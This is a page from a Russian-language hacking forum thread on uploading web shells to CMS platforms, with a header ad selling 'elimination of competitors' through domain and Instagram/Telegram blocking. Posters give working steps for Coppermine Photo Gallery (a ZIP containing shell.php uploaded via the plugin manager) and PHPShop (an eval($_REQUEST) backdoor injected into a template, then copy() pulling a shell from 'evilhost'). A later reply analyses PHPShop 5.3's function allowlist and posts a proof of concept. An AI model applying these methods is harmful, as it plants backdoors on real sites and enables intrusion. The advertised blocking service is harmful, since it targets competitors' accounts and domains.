УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
[ Заливка шелла в Cms\|Blogs ]

Страница 2 из 2

Опции темы

Поиск в этой теме

Опции просмотра

#11

20.12.2012, 14:11

Unknown

Guest

Сообщений: n/a

Провел на форуме:
28262

Репутация: 23

Загрузка веб-шелла в Coppermine Photo Gallery

Загрузка веб-шелла в Coppermine Photo Gallery

Зависимости: аккаунт администратора, права на запись.

Описание: Загружать веб-шелл будем через менеджер плагинов в ZIP архиве. Данный способ проверен на последней версии cpg 1.5.20.

Инструкция: В верхнем меню, переходим по адресу Конфигурация -> Менеджер плагинов:

Или по адресу:

Код:

Code:
/pluginmgr.php

На этой странице видем форму загрузки файлов:

Она загружает ZIP архивы, и соответственно распаковывает их в папку соответствующею названию архива. Никакой проверки содержания архива не производится, поэтому нам нужно всего лишь создать zip и поместительность в него один файл - наш шелл.

После загрузки архива, ваш шелл будет доступен по адресу:

Цитата:

Сообщение от None

/plugins/
shell.php

#12

01.03.2013, 21:17

nemaniak

Участник форума

Регистрация: 10.06.2008

Сообщений: 201

Провел на форуме:
1174919

Репутация: 229

[COLOR="SandyBrown"][SIZE="2"]B2Evolution

#13

16.03.2013, 02:31

Take_IT

Guest

Сообщений: n/a

Провел на форуме:
97570

Репутация: 267

PHPShop & PHPShop CMS Free - Latest Version

Developers - phpshop.ru , cms.phpshopcms.ru

Need: Admin Access

Admin url: /phpshop/admpanel/

Заходим в редактор .tpl шаблонов. Выбираем тему с шаблоном которой будем работать, можно выбрать текущую тему, например "gray"

Выбираем файл шаблона, например файл шаблона для главной страницы "main/index.tpl"

Внедряем свой код

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]php

[/COLOR][COLOR="#007700"]eval([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]@[/COLOR][/COLOR]

Смотрим абсолютный путь:

Код:

Code:
localhost/?e=phpinfo();

Льем шелл:

Код:

Code:
localhost/?e=copy("evilhost/shell.txt","/home/yoursite/phpshop/templates/gray/main/shell.php");

#14

18.03.2019, 04:46

l1ght

Reservists Of Antichat - Level 6

Регистрация: 05.12.2006

Сообщений: 195

Провел на форуме:
14023893

Репутация: 2163

Цитата:

Сообщение от Take_IT

Take_IT said:
↑

PHPShop & PHPShop CMS Free - Latest Version

обновлю пост, последняя на данный момент версия PHPShop 5.3, список допустимых функций зашит в массив, смотрим на регулярки:

./class/parser.class.php

Код:

Code:
function Parser($string, $debug = false) {

    $dis = @preg_replace_callback("/@([a-zA-Z0-9_]+)@/", 'SysValueReturn', @preg_replace_callback("/(@php)(.*)(php@)/sU", "evalstr", str_replace('+', '+', $string)));

...

Код:

Code:
function evalstr($str) {
    ob_start();
    if (parser_function_guard == 'true') {
        if (!allowedFunctions($str[2]))
            return ob_get_clean();
    }
    if (eval(stripslashes($str[2])) !== NULL) {
        echo ('     PHP');
        echo ('  :');
        echo ('');
        echo ($str[2]);
        echo ('');
        return ob_get_clean();
    }
    return ob_get_clean();
}

...

Код:

Code:
function allowedFunctions($str) {
    $Functions = array(
        'if',
        'else',
        'switch',
        'for',
        'foreach',
        'echo',
        'print',
        'print_r',
        'array',
        'isset',
        'empty',
        'chr',
        '__',
        'str_replace',
        '__hide',
        'empty'
    );
    $allowFunctions = array_merge($Functions, explode(',', parser_function_allowed));
    preg_match_all('/\s*([A-Za-z0-9_$]+)\s*\(/isU', $str, $findedFunctions);
    $remElements = array_diff($findedFunctions[1], $allowFunctions);
    $denyFunctions = explode(',', parser_function_deny);
    foreach ($denyFunctions as $deny)
        if (stristr($str, $deny))
            $remElements[] = $deny;
    if (count($remElements) > 0) {
        echo ('    ');
        echo ('   :');
        echo ('');
        foreach ($remElements as $remElement) {
            echo ($remElement . '()');
        }
        echo ('');
        echo ('   (     phpshop/inc/config.ini  [function]):');
        echo ('');
        foreach ($allowFunctions as $allowFunction) {
            echo ($allowFunction . '()
');
        }
        echo ('');
        return false;
    } else {
        return true;
    }
}

создаем страницу или новость

универсальный poc для php5 и php7

Код:

Code:
@php ?> php@

?a=phpinfo();//

__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..

Страница 2 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Заливка шелла через БД	Tosic	Сценарии/CMF/СMS	8	10.09.2014 01:20
[sphider] Заливка шелла	Dimi4	Веб-уязвимости	0	13.12.2008 23:47
Заливка шелла в [PHP-Fusion]	liauliau	Сценарии/CMF/СMS	0	14.07.2006 18:50
Заливка шелла, взлом сайта.	Sulf aka Joker	Болталка	2	03.07.2006 23:55
Заливка шелла черех смайлы в ipb	..::k0rps::..	Сценарии/CMF/СMS	1	28.11.2005 14:48

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход